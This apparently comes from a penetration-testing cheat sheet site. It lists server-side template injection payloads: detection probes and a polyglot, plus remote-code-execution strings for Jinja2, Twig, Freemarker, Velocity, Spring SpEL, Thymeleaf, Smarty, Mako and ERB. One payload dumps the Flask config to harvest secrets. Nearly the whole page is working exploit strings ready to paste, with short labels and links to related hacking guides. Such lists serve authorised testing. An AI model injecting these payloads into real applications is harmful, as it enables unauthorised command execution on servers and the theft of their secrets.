← All Cheatsheets
web-pentest

SSTI — Server-Side Template Injection

Server-Side Template Injection — engine detection plus RCE payloads for Jinja2, Twig, Freemarker, Velocity, Spring SpEL, Thymeleaf, Smarty, Mako and ERB.

1 views Jun 2026 lazyhackers
Detection (6)
{{7*7}}
49 → Jinja2 / Twig
detect
${7*7}
49 → Freemarker / Spring SpEL / JSP EL
detect java
#{7*7}
49 → Ruby (Slim) / Thymeleaf
detect
<%= 7*7 %>
49 → ERB (Ruby) / EJS
detect ruby
{{7*'7'}}
7777777 → Jinja2; 49 → Twig (disambiguate the two)
detect
${{<%[%'"}}%\
Polyglot — fire everywhere and watch which errors
detect polyglot
Jinja2 (Python) (5)
{{config}}
Dump the Flask config (frequently contains secrets)
jinja2 recon
{{cycler.__init__.__globals__.os.popen('id').read()}}
RCE via cycler globals (modern, reliable)
jinja2 rce
{{lipsum.__globals__.os.popen('id').read()}}
RCE via the lipsum global
jinja2 rce
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
RCE via request globals
jinja2 rce
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
RCE via self/builtins
jinja2 rce
Twig (PHP) (3)
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}
RCE via the undefined-filter callback
twig rce
{{['id']|filter('system')}}
RCE via the filter() function
twig rce
{{['id',""]|sort('system')}}
RCE via the sort() callback
twig rce
Java — Freemarker / Velocity (3)
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
Freemarker RCE via Execute
freemarker rce
${"freemarker.template.utility.Execute"?new()("id")}
Freemarker one-liner RCE
freemarker rce
#set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("exec",$e.getClass()).invoke($e.getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")
Velocity RCE chain
velocity rce
Java — Spring SpEL / Thymeleaf (3)
${T(java.lang.Runtime).getRuntime().exec("id")}
Spring SpEL RCE
spel spring rce
__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x
Thymeleaf preprocessing RCE
thymeleaf rce
*{T(java.lang.Runtime).getRuntime().exec("id")}
Thymeleaf expression RCE
thymeleaf rce
Smarty / Mako / ERB (4)
{system('id')}
Smarty (PHP) direct command exec
smarty php rce
{php}system('id');{/php}
Smarty {php} tag (older versions)
smarty rce
${__import__('os').popen('id').read()}
Mako (Python) RCE
mako python rce
<%= system('id') %>
ERB (Ruby) command exec
erb ruby rce

Related Articles

5
Web Hacking

JSON and YAML Unsafe Deserialization

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …

20m read
Web Hacking

Supply Chain Attacks

Deep technical guide to software supply chain attacks — dependency confusion, malicious np…

16m read
Web Hacking

Cross-Site Scripting Mastery

Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…

19m read
Web Hacking

File Upload to RCE

Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…

12m read
Web Hacking

Advanced SSRF

Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…

16m read

Related Courses

2
Intermediate

Web Application Penetration Testing

Master web hacking from recon to reporting

30 · 9.3h
Intermediate

Bug Bounty Hunting — From Recon to Bounty

The practical playbook for finding real bugs on real targets. Recon methodology, vulnerabi…

0 · 7.2h